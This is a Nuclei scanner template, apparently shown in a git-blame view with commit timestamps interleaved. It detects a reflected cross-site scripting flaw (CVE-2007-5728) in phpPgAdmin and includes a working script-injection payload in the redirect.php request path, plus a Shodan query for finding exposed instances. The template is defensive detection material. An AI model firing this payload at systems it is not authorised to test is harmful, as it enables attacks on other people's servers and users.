2023-07-24 17:58:28 +00:00
id : CVE-2007-5728
2021-11-20 12:27:41 +00:00
info :
2022-08-16 14:14:41 +00:00
name : phpPgAdmin <=4.1.1 - Cross-Site Scripting
2021-11-20 12:27:41 +00:00
author : dhiyaneshDK
severity : medium
2022-08-16 14:14:41 +00:00
description : phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 13:22:34 +00:00
remediation : |
Upgrade to a patched version of phpPgAdmin or apply the necessary security patches provided by the vendor.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/30090
2022-05-17 09:18:12 +00:00
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html
2023-07-24 17:58:28 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2007-5728
2023-07-15 16:29:17 +00:00
- http://www.debian.org/security/2008/dsa-1693
- http://www.novell.com/linux/security/advisories/2007_24_sr.html
2022-04-01 08:51:42 +00:00
classification :
2022-09-06 01:33:31 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
2023-04-18 02:40:53 +00:00
cvss-score : 4.3
2023-07-24 17:58:28 +00:00
cve-id : CVE-2007-5728
2022-09-06 01:33:31 +00:00
cwe-id : CWE-79
2023-08-31 11:46:18 +00:00
epss-score : 0.02361
2023-12-12 11:07:52 +00:00
epss-percentile : 0.88642
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:*
2022-04-22 10:38:41 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : phppgadmin
product : phppgadmin
2023-09-06 13:22:34 +00:00
shodan-query : http.title:"phpPgAdmin"
2022-08-27 04:41:18 +00:00
tags : cve,cve2007,xss,pgadmin,phppgadmin,edb
2021-11-20 12:27:41 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-20 12:27:41 +00:00
- method : GET
path :
2023-07-28 06:11:31 +00:00
- '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?subject=server&server=test'
2021-11-20 12:27:41 +00:00
matchers-condition : and
matchers :
- type : word
words :
2023-07-24 17:55:03 +00:00
- '<script>alert(document.domain)</script>'
- 'phpPgAdmin'
condition : and
case-insensitive : true
2021-11-21 09:23:15 +00:00
2021-11-20 12:27:41 +00:00
- type : word
2021-11-21 09:23:15 +00:00
part : header
2021-11-20 12:27:41 +00:00
words :
- "text/html"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2023-12-29 09:30:44 +00:00
# digest: 4a0a00473045022100dc5ae294908867ea9cfb3d84402f9150ea3eba52581a1435594505653c59b4a902202749fa215a1e51172d887e6a52ca776e6530f8537f8df687fba7ed249836eb6e:922c64590222798bb761d5b6d8e72950